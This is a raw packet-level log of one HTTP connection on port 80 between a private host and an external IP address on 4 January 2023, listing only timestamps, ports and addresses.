Jan 4, 2023 16:47:25.027818918 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.027827024 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.027827024 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.027848959 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.027873039 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.027873039 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.027878046 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.027905941 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.027935028 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.027947903 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.027949095 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.027959108 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.027983904 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.027991056 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.027991056 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.028012037 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.028034925 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.028037071 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.028034925 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.028062105 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.028086901 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.028089046 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.028089046 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.028151989 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.028152943 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.049459934 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.049496889 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.049520969 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.049546003 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.049573898 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.049577951 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.049597979 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.049618006 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.049623966 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.049650908 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.049674034 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.049707890 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.049717903 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.049717903 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.049719095 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.049745083 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.049746990 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.049772978 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.049786091 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.049798012 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.049808979 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.049823999 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.049849987 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.049870968 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.049874067 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.049889088 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.049900055 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.049926043 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.049932957 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.049958944 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.049961090 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.050007105 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.050010920 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.050044060 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.050052881 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.050092936 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.050092936 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.051623106 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.051660061 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.051713943 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.051740885 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.051742077 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.051740885 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.051769972 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.051796913 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.051796913 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.051796913 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.051824093 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.051846027 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.051846027 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.051852942 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.051882029 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.051898003 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.051898003 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.051912069 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.051939011 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.051955938 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.051955938 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.051965952 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.051992893 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.052014112 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.052014112 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.052023888 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.052052975 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.052069902 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.052069902 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.052079916 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.052108049 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.052125931 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.052125931 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.052135944 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.052164078 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.052181005 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.052181005 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.052190065 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.052217007 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.052237034 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.052237034 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.052244902 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.052273989 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.052295923 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.052295923 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.052299976 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.052330017 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.052349091 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.052349091 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.052356958 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.052385092 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.052395105 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.052409887 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.052412033 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.052440882 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.052459955 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.052459955 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.052470922 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.052500010 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.052525043 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.052525997 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.052525043 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.052553892 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.052572966 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.052572966 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.052582026 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.052608967 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.052628994 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.052628994 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.052637100 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.052664042 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.052681923 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.052681923 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.052690983 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.052720070 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.052736044 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.052736044 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.052748919 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.052777052 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.052794933 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.052794933 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.052804947 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.052834034 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.052850962 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.052850962 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.052864075 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.052891970 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.052910089 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.052910089 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.052920103 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.052938938 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.053106070 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.053670883 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.053738117 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.053783894 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.053812981 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.053838968 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.053860903 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.053860903 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.053860903 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.053865910 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.053888083 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.053914070 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.053931952 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.053931952 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.053942919 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.053972006 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.053999901 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.054012060 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.054012060 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.054028034 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.054055929 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.054056883 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.054105997 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.054121017 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.054121017 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.054133892 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.054162025 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.054173946 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.054173946 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.054189920 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.054212093 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.054218054 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.054245949 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.054263115 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.054263115 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.054272890 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.054301977 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.054318905 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.054318905 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.054328918 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.054357052 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.054378033 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.054378033 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.054384947 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.054414988 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.054426908 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.054426908 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.054441929 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.054470062 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.054491997 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.054491997 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.054497004 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.054526091 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.054543018 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.054543018 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.054553032 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.054580927 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.054604053 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.054604053 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.054606915 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.054637909 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.054663897 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.054666996 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.054666996 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.054706097 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.054723978 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.054771900 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.077020884 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.077059984 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.077085972 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.077110052 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.077133894 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.077131987 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.077161074 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.077188969 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.077214003 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.077224970 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.077224970 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.077241898 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.077270031 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.077296972 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.077306986 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.077306986 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.077306986 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.077322960 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.077332020 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.077351093 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.077374935 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.077425957 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.077425003 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.077425003 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.077425003 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.077451944 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.077478886 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.077487946 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.077487946 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.077505112 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.077532053 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.077539921 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.077539921 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.077559948 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.077579021 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.077625990 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.077626944 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.077950954 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.079988003 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.080038071 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.080073118 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.080106974 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.080140114 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.080151081 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.080151081 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.080174923 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.080212116 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.080218077 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.080218077 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.080249071 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.080269098 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.080269098 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.080285072 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.080319881 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.080337048 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.080337048 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.080360889 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.080394983 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.080416918 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.080416918 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.080430031 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.080466986 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.080487013 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.080487013 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.080501080 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.080537081 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.080555916 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.080555916 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.080573082 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.080607891 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.080626965 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.080626965 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.080642939 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.080679893 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.080704927 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.080704927 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.080715895 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.080743074 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.080753088 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.080789089 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.080790997 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.080826044 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.080845118 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.080846071 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.080861092 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.080898046 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.080916882 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.080916882 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.080935001 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.080970049 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.080996990 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.080996990 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.081002951 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.081034899 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.081043005 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.081063986 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.081080914 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.081120014 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.081139088 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.081139088 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.081156969 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.081192970 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.081209898 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.081209898 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.081228971 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.081264973 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.081285000 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.081285000 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.081299067 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.081326962 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.081336021 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.081392050 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.081403971 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.081403971 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.081437111 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.081481934 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.081485033 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.081532001 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.081542969 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.081542969 CET	49695	80	192.168.2.4	109.107.173.210
